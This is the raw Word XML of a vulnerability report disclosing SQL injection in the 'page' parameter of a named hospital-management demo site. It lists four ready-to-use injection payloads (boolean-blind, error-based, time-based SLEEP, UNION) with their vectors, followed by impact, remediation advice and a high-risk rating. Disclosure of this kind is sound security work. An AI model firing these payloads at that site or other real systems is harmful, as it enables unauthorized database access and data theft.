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5F2D" w14:textId="6105746B" w:rsidR="004F0E3E" w:rsidRPr="008F7EBC" w:rsidRDefault="00434237" w:rsidP="00434237">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="w16se">
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </mc:Choice>
            <mc:Fallback>
              <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
            </mc:Fallback>
          </mc:AlternateContent>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="w16se">
            <w16se:symEx w16se:font="Segoe UI Emoji" w16se:char="26A0"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>⚠</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>️</w:t>
      </w:r>
      <w:r w:rsidR="00AA5D8F" w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>VULNERABILITY REPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="w16se">
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </mc:Choice>
            <mc:Fallback>
              <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
            </mc:Fallback>
          </mc:AlternateContent>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="w16se">
            <w16se:symEx w16se:font="Segoe UI Emoji" w16se:char="26A0"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>⚠</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>️</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E808A66" w14:textId="6AE52897" w:rsidR="00AA5D8F" w:rsidRPr="008F7EBC" w:rsidRDefault="00AA5D8F" w:rsidP="00AA5D8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TARGET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA01E6F" w14:textId="77777777" w:rsidR="00AA5D8F" w:rsidRPr="008F7EBC" w:rsidRDefault="00000000" w:rsidP="00AA5D8F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00AA5D8F" w:rsidRPr="008F7EBC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>https://demo.amarhms.com/arch/index.php?page=dashboard</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F753C68" w14:textId="66811434" w:rsidR="0062121B" w:rsidRPr="00CC50E6" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Executive Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B394D" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This vulnerability assessment report aims to outline a critical security vulnerability discovered on the website hosted at "</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>https://demo.amarhms.com/arch/index.php?page=</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>PAYLOAD</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>". The identified vulnerability involves SQL injection, which allows attackers to manipulate database queries, potentially leading to unauthorized access and disclosure of sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F206D4" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4168526D" w14:textId="6BF3BE27" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C57F3" w14:textId="00B4674D" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Vulnerability Type: SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C4F7C" w14:textId="23EBAEF8" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Vulnerable URL: "https://demo.amarhms.com/arch/index.php?page=PAYLOAD"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04746FC3" w14:textId="23A42A33" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Affected Parameter: page (GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F04025" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Payloads Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D976AC" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>a. Boolean-based blind:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AA9D45" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>- Payload: page=-6483' OR 6800=6800-- YVJL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3160497E" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>- Vector: OR [INFERENCE]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F0300D" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>b. Error-based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A705549" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">- Payload: page=dashboard' AND GTID_SUBSET(CONCAT(0x71766b7a71,(SELECT (ELT(6432=6432,1))),0x71766b7871),6432)-- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sXup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4284C74F" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>- Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEE9DA" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>c. Time-based blind:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE4D53" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>- Payload: page=dashboard' AND (SELECT 7214 FROM (SELECT(SLEEP(12)))</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>zmTb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">)-- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>cixu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23A9502E" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>- Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3175C52F" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>d. Union query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1A7910" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>- Payload: page=-8155' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766b7a71,0x6a725041646978424f584558674d4e4f45494c6a654473434a6647676f646d7347615350506c486d,0x71766b7871),NULL-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A31E40" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>- Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227AF6DF" w14:textId="77777777" w:rsidR="00287B08" w:rsidRDefault="00287B08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CC4303" w14:textId="4494FB56" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="00434237" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1FE7D" w14:textId="04575EEF" w:rsidR="00434237" w:rsidRPr="008F7EBC" w:rsidRDefault="00434237" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09148AE5" wp14:editId="30032962">
            <wp:extent cx="2419688" cy="1428949"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4648314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31496" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2419688" cy="1428949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3440C904" w14:textId="415B0664" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3381AF" w14:textId="00D2DBA4" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Exploiting this vulnerability allows attackers to manipulate database queries, potentially leading to unauthorized access, data disclosure, and the ability to execute malicious commands within the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A45F0C8" w14:textId="3B63113B" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A57EF44" w14:textId="4665F3A9" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To mitigate the SQL injection vulnerability, the following recommendations are advised:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A82D8BE" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Parameterized Queries: Implement parameterized queries or prepared statements to ensure proper separation of SQL code and user input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1F773" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Input Validation: Implement strict input validation to filter out malicious characters and patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143EA529" w14:textId="77777777" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Principle of Least Privilege: Apply the principle of least privilege to database accounts, granting only necessary permissions for accessing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB6CA92" w14:textId="25ABB66D" w:rsidR="00434237" w:rsidRPr="008F7EBC" w:rsidRDefault="00434237" w:rsidP="0062121B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Block ip if there </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> too many responses from a single ip address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4252DA14" w14:textId="50417D60" w:rsidR="0062121B" w:rsidRPr="008F7EBC" w:rsidRDefault="0062121B" w:rsidP="0062121B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64911332" w14:textId="4CDE7320" w:rsidR="00651B72" w:rsidRDefault="0062121B" w:rsidP="00651B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F7EBC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Considering the severity of the SQL injection vulnerability, it is classified as high risk. Immediate action is recommended to address and remediate this vulnerability to prevent unauthorized access and protect the integrity and confidentiality of the website's data.</w:t>
      </w:r>
    </w:p>
